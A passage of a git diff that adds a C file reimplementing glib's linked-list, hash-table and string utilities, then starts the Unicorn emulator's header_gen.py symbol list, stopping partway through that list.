gint*)v2); +} + +/* Doubly-linked list */ + +GList *g_list_first(GList *list) +{ + if (list == NULL) return NULL; + while (list->prev) list = list->prev; + return list; +} + +void g_list_foreach(GList *list, GFunc func, gpointer user_data) +{ + GList *lp; + for (lp = list; lp; lp = lp->next) { + (*func)(lp->data, user_data); + } +} + +void g_list_free(GList *list) +{ + GList *lp, *next, *prev = NULL; + if (list) prev = list->prev; + for (lp = list; lp; lp = next) { + next = lp->next; + free(lp); + } + for (lp = prev; lp; lp = prev) { + prev = lp->prev; + free(lp); + } +} + +GList *g_list_insert_sorted(GList *list, gpointer data, GCompareFunc compare) +{ + GList *i; + GList *n = (GList*)g_malloc(sizeof(GList)); + n->data = data; + if (list == NULL) { + n->next = n->prev = NULL; + return n; + } + for (i = list; i; i = i->next) { + n->prev = i->prev; + if ((*compare)(data, i->data) <= 0) { + n->next = i; + i->prev = n; + if (i == list) return n; + else return list; + } + } + n->prev = n->prev->next; + n->next = NULL; + n->prev->next = n; + return list; +} + +GList *g_list_prepend(GList *list, gpointer data) +{ + GList *n = (GList*)g_malloc(sizeof(GList)); + n->next = list; + n->prev = NULL; + n->data = data; + return n; +} + +GList *g_list_remove_link(GList *list, GList *llink) +{ + if (llink) { + if (llink == list) list = list->next; + if (llink->prev) llink->prev->next = llink->next; + if (llink->next) llink->next->prev = llink->prev; + } + return list; +} + +// code copied from glib/glist.c, version 2.28.0 +static GList *g_list_sort_merge(GList *l1, + GList *l2, + GFunc compare_func, + gpointer user_data) +{ + GList list, *l, *lprev; + gint cmp; + + l = &list; + lprev = NULL; + + while (l1 && l2) + { + cmp = ((GCompareDataFunc) compare_func) (l1->data, l2->data, user_data); + + if (cmp <= 0) + { + l->next = l1; + l1 = l1->next; + } + else + { + l->next = l2; + l2 = l2->next; + } + l = l->next; + l->prev = lprev; + lprev = l; + } + l->next = l1 ? l1 : l2; + l->next->prev = l; + + return list.next; +} + +static GList *g_list_sort_real(GList *list, + GFunc compare_func, + gpointer user_data) +{ + GList *l1, *l2; + + if (!list) + return NULL; + if (!list->next) + return list; + + l1 = list; + l2 = list->next; + + while ((l2 = l2->next) != NULL) + { + if ((l2 = l2->next) == NULL) + break; + l1 = l1->next; + } + l2 = l1->next; + l1->next = NULL; + + return g_list_sort_merge (g_list_sort_real (list, compare_func, user_data), + g_list_sort_real (l2, compare_func, user_data), + compare_func, + user_data); +} + +/** + * g_list_sort: + * @list: a #GList + * @compare_func: the comparison function used to sort the #GList. + * This function is passed the data from 2 elements of the #GList + * and should return 0 if they are equal, a negative value if the + * first element comes before the second, or a positive value if + * the first element comes after the second. + * + * Sorts a #GList using the given comparison function. + * + * Returns: the start of the sorted #GList + */ +/** + * GCompareFunc: + * @a: a value. + * @b: a value to compare with. + * @Returns: negative value if @a < @b; zero if @a = @b; positive + * value if @a > @b. + * + * Specifies the type of a comparison function used to compare two + * values. The function should return a negative integer if the first + * value comes before the second, 0 if they are equal, or a positive + * integer if the first value comes after the second. + **/ +GList *g_list_sort (GList *list, GCompareFunc compare_func) +{ + return g_list_sort_real (list, (GFunc) compare_func, NULL); +} + +/* END of g_list related functions */ + +/* Singly-linked list */ + +GSList *g_slist_append(GSList *list, gpointer data) +{ + GSList *head = list; + if (list) { + while (list->next) list = list->next; + list->next = (GSList*)g_malloc(sizeof(GSList)); + list = list->next; + } else { + head = list = (GSList*)g_malloc(sizeof(GSList)); + } + list->data = data; + list->next = NULL; + return head; +} + +void g_slist_foreach(GSList *list, GFunc func, gpointer user_data) +{ + GSList *lp; + for (lp = list; lp; lp = lp->next) { + (*func)(lp->data, user_data); + } +} + +void g_slist_free(GSList *list) +{ + GSList *lp, *next; + for (lp = list; lp; lp = next) { + next = lp->next; + free(lp); + } +} + +GSList *g_slist_prepend(GSList *list, gpointer data) +{ + GSList *head = (GSList*)g_malloc(sizeof(GSList)); + head->next = list; + head->data = data; + return head; +} + +static GSList *g_slist_sort_merge (GSList *l1, + GSList *l2, + GFunc compare_func, + gpointer user_data) +{ + GSList list, *l; + gint cmp; + + l=&list; + + while (l1 && l2) + { + cmp = ((GCompareDataFunc) compare_func) (l1->data, l2->data, user_data); + + if (cmp <= 0) + { + l=l->next=l1; + l1=l1->next; + } + else + { + l=l->next=l2; + l2=l2->next; + } + } + l->next= l1 ? l1 : l2; + + return list.next; +} + +static GSList *g_slist_sort_real (GSList *list, + GFunc compare_func, + gpointer user_data) +{ + GSList *l1, *l2; + + if (!list) + return NULL; + if (!list->next) + return list; + + l1 = list; + l2 = list->next; + + while ((l2 = l2->next) != NULL) + { + if ((l2 = l2->next) == NULL) + break; + l1=l1->next; + } + l2 = l1->next; + l1->next = NULL; + + return g_slist_sort_merge (g_slist_sort_real (list, compare_func, user_data), + g_slist_sort_real (l2, compare_func, user_data), + compare_func, + user_data); +} + +/** + * g_slist_sort: + * @list: a #GSList + * @compare_func: the comparison function used to sort the #GSList. + * This function is passed the data from 2 elements of the #GSList + * and should return 0 if they are equal, a negative value if the + * first element comes before the second, or a positive value if + * the first element comes after the second. + * + * Sorts a #GSList using the given comparison function. + * + * Returns: the start of the sorted #GSList + */ +GSList *g_slist_sort (GSList *list, + GCompareFunc compare_func) +{ + return g_slist_sort_real (list, (GFunc) compare_func, NULL); +} + +/* END of g_slist related functions */ + +// Hash functions lifted glib-2.28.0/glib/ghash.c + +#define HASH_TABLE_MIN_SHIFT 3 /* 1 << 3 == 8 buckets */ + +typedef struct _GHashNode GHashNode; + +struct _GHashNode { + gpointer key; + gpointer value; + + /* If key_hash == 0, node is not in use + * If key_hash == 1, node is a tombstone + * If key_hash >= 2, node contains data */ + guint key_hash; +}; + +struct _GHashTable { + gint size; + gint mod; + guint mask; + gint nnodes; + gint noccupied; /* nnodes + tombstones */ + GHashNode *nodes; + GHashFunc hash_func; + GEqualFunc key_equal_func; + volatile gint ref_count; + GDestroyNotify key_destroy_func; + GDestroyNotify value_destroy_func; +}; + +/** + * g_hash_table_destroy: + * @hash_table: a #GHashTable. + * + * Destroys all keys and values in the #GHashTable and decrements its + * reference count by 1. If keys and/or values are dynamically allocated, + * you should either free them first or create the #GHashTable with destroy + * notifiers using g_hash_table_new_full(). In the latter case the destroy + * functions you supplied will be called on all keys and values during the + * destruction phase. + **/ +void g_hash_table_destroy (GHashTable *hash_table) +{ + if (hash_table == NULL) return; + if (hash_table->ref_count == 0) return; + + g_hash_table_remove_all (hash_table); + g_hash_table_unref (hash_table); +} + +/** + * g_hash_table_find: + * @hash_table: a #GHashTable. + * @predicate: function to test the key/value pairs for a certain property. + * @user_data: user data to pass to the function. + * + * Calls the given function for key/value pairs in the #GHashTable until + * @predicate returns %TRUE. The function is passed the key and value of + * each pair, and the given @user_data parameter. The hash table may not + * be modified while iterating over it (you can't add/remove items). + * + * Note, that hash tables are really only optimized for forward lookups, + * i.e. g_hash_table_lookup(). + * So code that frequently issues g_hash_table_find() or + * g_hash_table_foreach() (e.g. in the order of once per every entry in a + * hash table) should probably be reworked to use additional or different + * data structures for reverse lookups (keep in mind that an O(n) find/foreach + * operation issued for all n values in a hash table ends up needing O(n*n) + * operations). + * + * Return value: The value of the first key/value pair is returned, for which + * func evaluates to %TRUE. If no pair with the requested property is found, + * %NULL is returned. + * + * Since: 2.4 + **/ +gpointer g_hash_table_find (GHashTable *hash_table, + GHRFunc predicate, + gpointer user_data) +{ + gint i; + + if (hash_table == NULL) return NULL; + if (predicate == NULL) return NULL; + + for (i = 0; i < hash_table->size; i++) + { + GHashNode *node = &hash_table->nodes [i]; + + if (node->key_hash > 1 && predicate (node->key, node->value, user_data)) + return node->value; + } + + return NULL; +} + +/** + * g_hash_table_foreach: + * @hash_table: a #GHashTable. + * @func: the function to call for each key/value pair. + * @user_data: user data to pass to the function. + * + * Calls the given function for each of the key/value pairs in the + * #GHashTable. The function is passed the key and value of each + * pair, and the given @user_data parameter. The hash table may not + * be modified while iterating over it (you can't add/remove + * items). To remove all items matching a predicate, use + * g_hash_table_foreach_remove(). + * + * See g_hash_table_find() for performance caveats for linear + * order searches in contrast to g_hash_table_lookup(). + **/ +void g_hash_table_foreach (GHashTable *hash_table, + GHFunc func, + gpointer user_data) +{ + gint i; + + if (hash_table == NULL) return; + if (func == NULL) return; + + for (i = 0; i < hash_table->size; i++) + { + GHashNode *node = &hash_table->nodes [i]; + + if (node->key_hash > 1) + (* func) (node->key, node->value, user_data); + } +} + +/* + * g_hash_table_lookup_node_for_insertion: + * @hash_table: our #GHashTable + * @key: the key to lookup against + * @hash_return: key hash return location + * Return value: index of the described #GHashNode + * + * Performs a lookup in the hash table, preserving extra information + * usually needed for insertion. + * + * This function first computes the hash value of the key using the + * user's hash function. + * + * If an entry in the table matching @key is found then this function + * returns the index of that entry in the table, and if not, the + * index of an unused node (empty or tombstone) where the key can be + * inserted. + * + * The computed hash value is returned in the variable pointed to + * by @hash_return. This is to save insertions from having to compute + * the hash record again for the new record. + */ +static inline guint g_hash_table_lookup_node_for_insertion (GHashTable *hash_table, + gconstpointer key, + guint *hash_return) +{ + GHashNode *node; + guint node_index; + guint hash_value; + guint first_tombstone = 0; + gboolean have_tombstone = FALSE; + guint step = 0; + + /* Empty buckets have hash_value set to 0, and for tombstones, it's 1. + * We need to make sure our hash value is not one of these. */ + + hash_value = (* hash_table->hash_func) (key); + if (hash_value <= 1) + hash_value = 2; + + *hash_return = hash_value; + + node_index = hash_value % hash_table->mod; + node = &hash_table->nodes [node_index]; + + while (node->key_hash) + { + /* We first check if our full hash values + * are equal so we can avoid calling the full-blown + * key equality function in most cases. + */ + + if (node->key_hash == hash_value) + { + if (hash_table->key_equal_func) + { + if (hash_table->key_equal_func (node->key, key)) + return node_index; + } + else if (node->key == key) + { + return node_index; + } + } + else if (node->key_hash == 1 && !have_tombstone) + { + first_tombstone = node_index; + have_tombstone = TRUE; + } + + step++; + node_index += step; + node_index &= hash_table->mask; + node = &hash_table->nodes [node_index]; + } + + if (have_tombstone) + return first_tombstone; + + return node_index; +} + +/* Each table size has an associated prime modulo (the first prime + * lower than the table size) used to find the initial bucket. Probing + * then works modulo 2^n. The prime modulo is necessary to get a + * good distribution with poor hash functions. */ +static const gint prime_mod [] = { + 1, /* For 1 << 0 */ + 2, + 3, + 7, + 13, + 31, + 61, + 127, + 251, + 509, + 1021, + 2039, + 4093, + 8191, + 16381, + 32749, + 65521, /* For 1 << 16 */ + 131071, + 262139, + 524287, + 1048573, + 2097143, + 4194301, + 8388593, + 16777213, + 33554393, + 67108859, + 134217689, + 268435399, + 536870909, + 1073741789, + 2147483647 /* For 1 << 31 */ +}; + +static void g_hash_table_set_shift (GHashTable *hash_table, gint shift) +{ + gint i; + guint mask = 0; + + hash_table->size = 1 << shift; + hash_table->mod = prime_mod [shift]; + + for (i = 0; i < shift; i++) + { + mask <<= 1; + mask |= 1; + } + + hash_table->mask = mask; +} + +static gint g_hash_table_find_closest_shift (gint n) +{ + gint i; + + for (i = 0; n; i++) + n >>= 1; + + return i; +} + +static void g_hash_table_set_shift_from_size (GHashTable *hash_table, gint size) +{ + gint shift; + + shift = g_hash_table_find_closest_shift (size); + shift = MAX (shift, HASH_TABLE_MIN_SHIFT); + + g_hash_table_set_shift (hash_table, shift); +} + +/* + * g_hash_table_resize: + * @hash_table: our #GHashTable + * + * Resizes the hash table to the optimal size based on the number of + * nodes currently held. If you call this function then a resize will + * occur, even if one does not need to occur. Use + * g_hash_table_maybe_resize() instead. + * + * This function may "resize" the hash table to its current size, with + * the side effect of cleaning up tombstones and otherwise optimizing + * the probe sequences. + */ +static void g_hash_table_resize (GHashTable *hash_table) +{ + GHashNode *new_nodes; + gint old_size; + gint i; + + old_size = hash_table->size; + g_hash_table_set_shift_from_size (hash_table, hash_table->nnodes * 2); + + new_nodes = g_new0 (GHashNode, hash_table->size); + + for (i = 0; i < old_size; i++) + { + GHashNode *node = &hash_table->nodes [i]; + GHashNode *new_node; + guint hash_val; + guint step = 0; + + if (node->key_hash <= 1) + continue; + + hash_val = node->key_hash % hash_table->mod; + new_node = &new_nodes [hash_val]; + + while (new_node->key_hash) + { + step++; + hash_val += step; + hash_val &= hash_table->mask; new_node = &new_nodes [hash_val]; + } + + *new_node = *node; + } + + g_free (hash_table->nodes); + hash_table->nodes = new_nodes; + hash_table->noccupied = hash_table->nnodes; +} + +/* + * g_hash_table_maybe_resize: + * @hash_table: our #GHashTable + * + * Resizes the hash table, if needed. + * + * Essentially, calls g_hash_table_resize() if the table has strayed + * too far from its ideal size for its number of nodes. + */ +static inline void g_hash_table_maybe_resize (GHashTable *hash_table) +{ + gint noccupied = hash_table->noccupied; + gint size = hash_table->size; + + if ((size > hash_table->nnodes * 4 && size > 1 << HASH_TABLE_MIN_SHIFT) || + (size <= noccupied + (noccupied / 16))) + g_hash_table_resize (hash_table); +} + +/* + * g_hash_table_insert_internal: + * @hash_table: our #GHashTable + * @key: the key to insert + * @value: the value to insert + * @keep_new_key: if %TRUE and this key already exists in the table + * then call the destroy notify function on the old key. If %FALSE + * then call the destroy notify function on the new key. + * + * Implements the common logic for the g_hash_table_insert() and + * g_hash_table_replace() functions. + * + * Do a lookup of @key. If it is found, replace it with the new + * @value (and perhaps the new @key). If it is not found, create a + * new node. + */ +static void g_hash_table_insert_internal (GHashTable *hash_table, + gpointer key, + gpointer value, + gboolean keep_new_key) +{ + GHashNode *node; + guint node_index; + guint key_hash; + guint old_hash; + + if (hash_table == NULL) return; + if (hash_table->ref_count == 0) return; + + node_index = g_hash_table_lookup_node_for_insertion (hash_table, key, &key_hash); + node = &hash_table->nodes [node_index]; + + old_hash = node->key_hash; + + if (old_hash > 1) + { + if (keep_new_key) + { + if (hash_table->key_destroy_func) + hash_table->key_destroy_func (node->key); + node->key = key; + } + else + { + if (hash_table->key_destroy_func) + hash_table->key_destroy_func (key); + } + + if (hash_table->value_destroy_func) + hash_table->value_destroy_func (node->value); + + node->value = value; + } + else + { + node->key = key; + node->value = value; + node->key_hash = key_hash; + + hash_table->nnodes++; + + if (old_hash == 0) + { + /* We replaced an empty node, and not a tombstone */ + hash_table->noccupied++; + g_hash_table_maybe_resize (hash_table); + } + } +} + +/** + * g_hash_table_insert: + * @hash_table: a #GHashTable. + * @key: a key to insert. + * @value: the value to associate with the key. + * + * Inserts a new key and value into a #GHashTable. + * + * If the key already exists in the #GHashTable its current value is replaced + * with the new value. If you supplied a @value_destroy_func when creating the + * #GHashTable, the old value is freed using that function. If you supplied + * a @key_destroy_func when creating the #GHashTable, the passed key is freed + * using that function. + **/ +void g_hash_table_insert (GHashTable *hash_table, + gpointer key, + gpointer value) +{ + g_hash_table_insert_internal (hash_table, key, value, FALSE); +} + +/* + * g_hash_table_lookup_node: + * @hash_table: our #GHashTable + * @key: the key to lookup against + * @hash_return: optional key hash return location + * Return value: index of the described #GHashNode + * + * Performs a lookup in the hash table. Virtually all hash operations + * will use this function internally. + * + * This function first computes the hash value of the key using the + * user's hash function. + * + * If an entry in the table matching @key is found then this function + * returns the index of that entry in the table, and if not, the + * index of an empty node (never a tombstone). + */ +static inline guint g_hash_table_lookup_node (GHashTable *hash_table, + gconstpointer key) +{ + GHashNode *node; + guint node_index; + guint hash_value; + guint step = 0; + + /* Empty buckets have hash_value set to 0, and for tombstones, it's 1. + * We need to make sure our hash value is not one of these. */ + + hash_value = (* hash_table->hash_func) (key); + if (hash_value <= 1) + hash_value = 2; + + node_index = hash_value % hash_table->mod; + node = &hash_table->nodes [node_index]; + + while (node->key_hash) + { + /* We first check if our full hash values + * are equal so we can avoid calling the full-blown + * key equality function in most cases. + */ + + if (node->key_hash == hash_value) + { + if (hash_table->key_equal_func) + { + if (hash_table->key_equal_func (node->key, key)) + break; + } + else if (node->key == key) + { + break; + } + } + + step++; + node_index += step; + node_index &= hash_table->mask; + node = &hash_table->nodes [node_index]; + } + + return node_index; +} + +/** + * g_hash_table_lookup: + * @hash_table: a #GHashTable. + * @key: the key to look up. + * + * Looks up a key in a #GHashTable. Note that this function cannot + * distinguish between a key that is not present and one which is present + * and has the value %NULL. If you need this distinction, use + * g_hash_table_lookup_extended(). + * + * Return value: the associated value, or %NULL if the key is not found. + **/ +gpointer g_hash_table_lookup (GHashTable *hash_table, + gconstpointer key) +{ + GHashNode *node; + guint node_index; + + if (hash_table == NULL) return NULL; + + node_index = g_hash_table_lookup_node (hash_table, key); + node = &hash_table->nodes [node_index]; + + return node->key_hash ? node->value : NULL; +} + +/** + * g_hash_table_new: + * @hash_func: a function to create a hash value from a key. + * Hash values are used to determine where keys are stored within the + * #GHashTable data structure. The g_direct_hash(), g_int_hash(), + * g_int64_hash(), g_double_hash() and g_str_hash() functions are provided + * for some common types of keys. + * If hash_func is %NULL, g_direct_hash() is used. + * @key_equal_func: a function to check two keys for equality. This is + * used when looking up keys in the #GHashTable. The g_direct_equal(), + * g_int_equal(), g_int64_equal(), g_double_equal() and g_str_equal() + * functions are provided for the most common types of keys. + * If @key_equal_func is %NULL, keys are compared directly in a similar + * fashion to g_direct_equal(), but without the overhead of a function call. + * + * Creates a new #GHashTable with a reference count of 1. + * + * Return value: a new #GHashTable. + **/ +GHashTable *g_hash_table_new(GHashFunc hash_func, GEqualFunc key_equal_func) +{ + return g_hash_table_new_full(hash_func, key_equal_func, NULL, NULL); +} + +/** + * g_hash_table_new_full: + * @hash_func: a function to create a hash value from a key. + * @key_equal_func: a function to check two keys for equality. + * @key_destroy_func: a function to free the memory allocated for the key + * used when removing the entry from the #GHashTable or %NULL if you + * don't want to supply such a function. + * @value_destroy_func: a function to free the memory allocated for the + * value used when removing the entry from the #GHashTable or %NULL if + * you don't want to supply such a function. + * + * Creates a new #GHashTable like g_hash_table_new() with a reference count + * of 1 and allows to specify functions to free the memory allocated for the + * key and value that get called when removing the entry from the #GHashTable. + * + * Return value: a new #GHashTable. + **/ +GHashTable* g_hash_table_new_full (GHashFunc hash_func, + GEqualFunc key_equal_func, + GDestroyNotify key_destroy_func, + GDestroyNotify value_destroy_func) +{ + GHashTable *hash_table; + + hash_table = (GHashTable*)g_malloc(sizeof(GHashTable)); + //hash_table = g_slice_new (GHashTable); + g_hash_table_set_shift (hash_table, HASH_TABLE_MIN_SHIFT); + hash_table->nnodes = 0; + hash_table->noccupied = 0; + hash_table->hash_func = hash_func ? hash_func : g_direct_hash; + hash_table->key_equal_func = key_equal_func; + hash_table->ref_count = 1; + hash_table->key_destroy_func = key_destroy_func; + hash_table->value_destroy_func = value_destroy_func; + hash_table->nodes = g_new0 (GHashNode, hash_table->size); + + return hash_table; +} + +/* + * g_hash_table_remove_all_nodes: + * @hash_table: our #GHashTable + * @notify: %TRUE if the destroy notify handlers are to be called + * + * Removes all nodes from the table. Since this may be a precursor to + * freeing the table entirely, no resize is performed. + * + * If @notify is %TRUE then the destroy notify functions are called + * for the key and value of the hash node. + */ +static void g_hash_table_remove_all_nodes (GHashTable *hash_table, + gboolean notify) +{ + int i; + + for (i = 0; i < hash_table->size; i++) + { + GHashNode *node = &hash_table->nodes [i]; + + if (node->key_hash > 1) + { + if (notify && hash_table->key_destroy_func) + hash_table->key_destroy_func (node->key); + + if (notify && hash_table->value_destroy_func) + hash_table->value_destroy_func (node->value); + } + } + + /* We need to set node->key_hash = 0 for all nodes - might as well be GC + * friendly and clear everything */ + memset (hash_table->nodes, 0, hash_table->size * sizeof (GHashNode)); + + hash_table->nnodes = 0; + hash_table->noccupied = 0; +} + +/** + * g_hash_table_remove_all: + * @hash_table: a #GHashTable + * + * Removes all keys and their associated values from a #GHashTable. + * + * If the #GHashTable was created using g_hash_table_new_full(), the keys + * and values are freed using the supplied destroy functions, otherwise you + * have to make sure that any dynamically allocated values are freed + * yourself. + * + * Since: 2.12 + **/ +void g_hash_table_remove_all (GHashTable *hash_table) +{ + if (hash_table == NULL) return; + + g_hash_table_remove_all_nodes (hash_table, TRUE); + g_hash_table_maybe_resize (hash_table); +} + +/* + * g_hash_table_remove_node: + * @hash_table: our #GHashTable + * @node: pointer to node to remove + * @notify: %TRUE if the destroy notify handlers are to be called + * + * Removes a node from the hash table and updates the node count. + * The node is replaced by a tombstone. No table resize is performed. + * + * If @notify is %TRUE then the destroy notify functions are called + * for the key and value of the hash node. + */ +static void g_hash_table_remove_node (GHashTable *hash_table, + GHashNode *node, + gboolean notify) +{ + if (notify && hash_table->key_destroy_func) + hash_table->key_destroy_func (node->key); + + if (notify && hash_table->value_destroy_func) + hash_table->value_destroy_func (node->value); + + /* Erect tombstone */ + node->key_hash = 1; + + /* Be GC friendly */ + node->key = NULL; + node->value = NULL; + + hash_table->nnodes--; +} +/* + * g_hash_table_remove_internal: + * @hash_table: our #GHashTable + * @key: the key to remove + * @notify: %TRUE if the destroy notify handlers are to be called + * Return value: %TRUE if a node was found and removed, else %FALSE + * + * Implements the common logic for the g_hash_table_remove() and + * g_hash_table_steal() functions. + * + * Do a lookup of @key and remove it if it is found, calling the + * destroy notify handlers only if @notify is %TRUE. + */ +static gboolean g_hash_table_remove_internal (GHashTable *hash_table, + gconstpointer key, + gboolean notify) +{ + GHashNode *node; + guint node_index; + + if (hash_table == NULL) return FALSE; + + node_index = g_hash_table_lookup_node (hash_table, key); + node = &hash_table->nodes [node_index]; + + /* g_hash_table_lookup_node() never returns a tombstone, so this is safe */ + if (!node->key_hash) + return FALSE; + + g_hash_table_remove_node (hash_table, node, notify); + g_hash_table_maybe_resize (hash_table); + + return TRUE; +} +/** + * g_hash_table_remove: + * @hash_table: a #GHashTable. + * @key: the key to remove. + * + * Removes a key and its associated value from a #GHashTable. + * + * If the #GHashTable was created using g_hash_table_new_full(), the + * key and value are freed using the supplied destroy functions, otherwise + * you have to make sure that any dynamically allocated values are freed + * yourself. + * + * Return value: %TRUE if the key was found and removed from the #GHashTable. + **/ +gboolean g_hash_table_remove (GHashTable *hash_table, + gconstpointer key) +{ + return g_hash_table_remove_internal (hash_table, key, TRUE); +} + +/** + * g_hash_table_unref: + * @hash_table: a valid #GHashTable. + * + * Atomically decrements the reference count of @hash_table by one. + * If the reference count drops to 0, all keys and values will be + * destroyed, and all memory allocated by the hash table is released. + * This function is MT-safe and may be called from any thread. + * + * Since: 2.10 + **/ +void g_hash_table_unref (GHashTable *hash_table) +{ + if (hash_table == NULL) return; + if (hash_table->ref_count == 0) return; + + hash_table->ref_count--; + if (hash_table->ref_count == 0) { + g_hash_table_remove_all_nodes (hash_table, TRUE); + g_free (hash_table->nodes); + g_free (hash_table); + } +} + +/** + * g_hash_table_ref: + * @hash_table: a valid #GHashTable. + * + * Atomically increments the reference count of @hash_table by one. + * This function is MT-safe and may be called from any thread. + * + * Return value: the passed in #GHashTable. + * + * Since: 2.10 + **/ +GHashTable *g_hash_table_ref (GHashTable *hash_table) +{ + if (hash_table == NULL) return NULL; + if (hash_table->ref_count == 0) return hash_table; + + //g_atomic_int_add (&hash_table->ref_count, 1); + hash_table->ref_count++; + return hash_table; +} + +guint g_hash_table_size(GHashTable *hash_table) +{ + if (hash_table == NULL) return 0; + + return hash_table->nnodes; +} + +/* END of g_hash_table related functions */ + +/* general g_XXX substitutes */ + +void g_free(gpointer ptr) +{ + free(ptr); +} + +gpointer g_malloc(size_t size) +{ + void *res; + if (size == 0) return NULL; + res = malloc(size); + if (res == NULL) exit(1); + return res; +} + +gpointer g_malloc0(size_t size) +{ + void *res; + if (size == 0) return NULL; + res = calloc(size, 1); + if (res == NULL) exit(1); + return res; +} + +gpointer g_try_malloc0(size_t size) +{ + if (size == 0) return NULL; + return calloc(size, 1); +} + +gpointer g_realloc(gpointer ptr, size_t size) +{ + void *res; + if (size == 0) { + free(ptr); + return NULL; + } + res = realloc(ptr, size); + if (res == NULL) exit(1); + return res; +} + +char *g_strdup(const char *str) +{ +#ifdef _MSC_VER + return str ? _strdup(str) : NULL; +#else + return str ? strdup(str) : NULL; +#endif +} + +char *g_strdup_printf(const char *format, ...) +{ + va_list ap; + char *res; + va_start(ap, format); + res = g_strdup_vprintf(format, ap); + va_end(ap); + return res; +} + +char *g_strdup_vprintf(const char *format, va_list ap) +{ + char *str_res = NULL; +#ifdef _MSC_VER + int len = _vscprintf(format, ap); + if( len < 0 ) + return NULL; + str_res = (char *)malloc(len+1); + if(str_res==NULL) + return NULL; + vsnprintf(str_res, len+1, format, ap); +#else + int ret = vasprintf(&str_res, format, ap); + if (ret == -1) { + return NULL; + } +#endif + return str_res; +} + +char *g_strndup(const char *str, size_t n) +{ + /* try to mimic glib's g_strndup */ + char *res = calloc(n + 1, 1); + strncpy(res, str, n); + return res; +} + +void g_strfreev(char **str_array) +{ + char **p = str_array; + if (p) { + while (*p) { + free(*p++); + } + } + free(str_array); +} + +gpointer g_memdup(gconstpointer mem, size_t byte_size) +{ + if (mem) { + void *res = g_malloc(byte_size); + memcpy(res, mem, byte_size); + return res; + } + return NULL; +} + +gpointer g_new_(size_t sz, size_t n_structs) +{ + size_t need = sz * n_structs; + if ((need / sz) != n_structs) return NULL; + return g_malloc(need); +} + +gpointer g_new0_(size_t sz, size_t n_structs) +{ + size_t need = sz * n_structs; + if ((need / sz) != n_structs) return NULL; + return g_malloc0(need); +} + +gpointer g_renew_(size_t sz, gpointer mem, size_t n_structs) +{ + size_t need = sz * n_structs; + if ((need / sz) != n_structs) return NULL; + return g_realloc(mem, need); +} + +/** + * g_strconcat: + * @string1: the first string to add, which must not be %NULL + * @Varargs: a %NULL-terminated list of strings to append to the string + * + * Concatenates all of the given strings into one long string. + * The returned string should be freed with g_free() when no longer needed. + * + * Note that this function is usually not the right function to use to + * assemble a translated message from pieces, since proper translation + * often requires the pieces to be reordered. + * + * <warning><para>The variable argument list <emphasis>must</emphasis> end + * with %NULL. If you forget the %NULL, g_strconcat() will start appending + * random memory junk to your string.</para></warning> + * + * Returns: a newly-allocated string containing all the string arguments + */ +gchar* g_strconcat (const gchar *string1, ...) +{ + va_list ap; + char *res; + size_t sz = strlen(string1); + va_start(ap, string1); + while (1) { + char *arg = va_arg(ap, char*); + if (arg == NULL) break; + sz += strlen(arg); + } + va_end(ap); + res = g_malloc(sz + 1); + strcpy(res, string1); + va_start(ap, string1); + while (1) { + char *arg = va_arg(ap, char*); + if (arg == NULL) break; + strcat(res, arg); + } + va_end(ap); + return res; +} + +/** + * g_strsplit: + * @string: a string to split. + * @delimiter: a string which specifies the places at which to split the string. + * The delimiter is not included in any of the resulting strings, unless + * @max_tokens is reached. + * @max_tokens: the maximum number of pieces to split @string into. If this is + * less than 1, the string is split completely. + * + * Splits a string into a maximum of @max_tokens pieces, using the given + * @delimiter. If @max_tokens is reached, the remainder of @string is appended + * to the last token. + * + * As a special case, the result of splitting the empty string "" is an empty + * vector, not a vector containing a single string. The reason for this + * special case is that being able to represent a empty vector is typically + * more useful than consistent handling of empty elements. If you do need + * to represent empty elements, you'll need to check for the empty string + * before calling g_strsplit(). + * + * Return value: a newly-allocated %NULL-terminated array of strings. Use + * g_strfreev() to free it. + **/ +gchar** g_strsplit (const gchar *string, + const gchar *delimiter, + gint max_tokens) +{ + GSList *string_list = NULL, *slist; + gchar **str_array, *s; + guint n = 0; + const gchar *remainder; + + if (string == NULL) return NULL; + if (delimiter == NULL) return NULL; + if (delimiter[0] == '\0') return NULL; + + if (max_tokens < 1) + max_tokens = G_MAXINT; + + remainder = string; + s = strstr (remainder, delimiter); + if (s) + { + gsize delimiter_len = strlen (delimiter); + + while (--max_tokens && s) + { + gsize len; + + len = s - remainder; + string_list = g_slist_prepend (string_list, + g_strndup (remainder, len)); + n++; + remainder = s + delimiter_len; + s = strstr (remainder, delimiter); + } + } + if (*string) + { + n++; + string_list = g_slist_prepend (string_list, g_strdup (remainder)); + } + + str_array = g_new (gchar*, n + 1); + + str_array[n--] = NULL; + for (slist = string_list; slist; slist = slist->next) + str_array[n--] = slist->data; + + g_slist_free (string_list); + + return str_array; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/header_gen.py b/ai_anti_malware/unicorn/unicorn-master/qemu/header_gen.py new file mode 100644 index 0000000..253bd3e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/header_gen.py @@ -0,0 +1,4085 @@ +#!/usr/bin/python +# Unicorn Emulator Engine +# By Dang Hoang Vu & Nguyen Anh Quynh + +# syntax: ./header_gen.py <arm|aarch64|x86|name> + +import sys + +symbols = ( + 'arm_release', + 'aarch64_tb_set_jmp_target', + 'ppc_tb_set_jmp_target', + 'use_idiv_instructions_rt', + 'tcg_target_deposit_valid', + 'helper_power_down', + 'check_exit_request', + 'address_space_unregister', + 'tb_invalidate_phys_page_fast', + 'phys_mem_clean', + 'tb_cleanup', + 'memory_map', + 'memory_map_ptr', + 'memory_unmap', + 'memory_free', + 'free_code_gen_buffer', + 'helper_raise_exception', + 'tcg_enabled', + 'tcg_exec_init', + 'memory_register_types', + 'cpu_exec_init_all', + 'vm_start', + 'resume_all_vcpus', + 'a15_l2ctlr_read', + 'a64_translate_init', + 'aa32_generate_debug_exceptions', + 'aa64_cacheop_access', + 'aa64_daif_access', + 'aa64_daif_write', + 'aa64_dczid_read', + 'aa64_fpcr_read', + 'aa64_fpcr_write', + 'aa64_fpsr_read', + 'aa64_fpsr_write', + 'aa64_generate_debug_exceptions', + 'aa64_zva_access', + 'aarch64_banked_spsr_index', + 'aarch64_restore_sp', + 'aarch64_save_sp', + 'accel_find', + 'accel_init_machine', + 'accel_type', + 'access_with_adjusted_size', + 'add128', + 'add16_sat', + 'add16_usat', + 'add192', + 'add8_sat', + 'add8_usat', + 'add_cpreg_to_hashtable', + 'add_cpreg_to_list', + 'addFloat128Sigs', + 'addFloat32Sigs', + 'addFloat64Sigs', + 'addFloatx80Sigs', + 'add_qemu_ldst_label', + 'address_space_access_valid', + 'address_space_destroy', + 'address_space_destroy_dispatch', + 'address_space_get_flatview', + 